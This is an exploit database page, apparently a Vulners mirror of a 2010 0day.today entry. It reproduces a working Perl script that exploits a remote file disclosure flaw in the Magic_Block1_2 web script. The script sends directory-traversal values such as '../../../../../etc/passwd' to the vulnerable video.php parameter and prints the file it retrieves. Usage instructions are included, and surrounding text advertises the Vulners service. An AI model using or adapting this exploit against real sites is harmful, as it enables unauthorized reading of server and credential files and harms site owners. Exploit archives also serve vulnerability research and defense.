Lucene search
+L

Magic_Block1_2 remote file disclosure exploit vulnerability

🗓️ 10 Feb 2010 00:00:00Reported by JiKoType 
zdt
 zdt
🔗 0day.today👁 25 Views

Remote file disclosure vulnerability in Magic_Block1_2 scrip

Code
===========================================================
Magic_Block1_2 remote file disclosure exploit vulnerability
===========================================================

links : http://mshaer.net/magic_blocks1_2.zip

#!/usr/bin/perl
#***********************************************************************************#
# Exploitation Remote File Disclosure Vulnerability By JIKO                                                      #
#***********************************************************************************#
# Author   : Jiko                                    
#***********************************************************************************#
#script http://mshaer.net/magic_blocks1_2.zip
#magic-blocks arab script
#simple exploit download file
#http://No-ExploiT.Com/includes/video.php?f=[ffile] with save as or a programme for download ex: IDM
use HTTP::Request;
use LWP::Simple;

sub header()
{

print "
-------------------------------------------------------------------\n
Coded by: JIKO\n
Usage   : $0 [traget] [FILE]\n
Example : $0 http://no-exploit.com/ ../../../../../etc/passwd\n
-----------------------------[No-ExploiT.Com]-------------------------------\n
";
}

$site= @ARGV[0];
$file= @ARGV[1];
$vul= "/includes/video.php";
$var="f";
if($ARGV[0] && $ARGV[1]){
header();
print "exploit No-exploit.com :\n";
getprint("$site/$vul?$var=$file");
}
else
{
    header();
    }




#  0day.today [2018-02-15]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Feb 2010 00:00Current
7.1High risk
Vulners AI Score7.1
25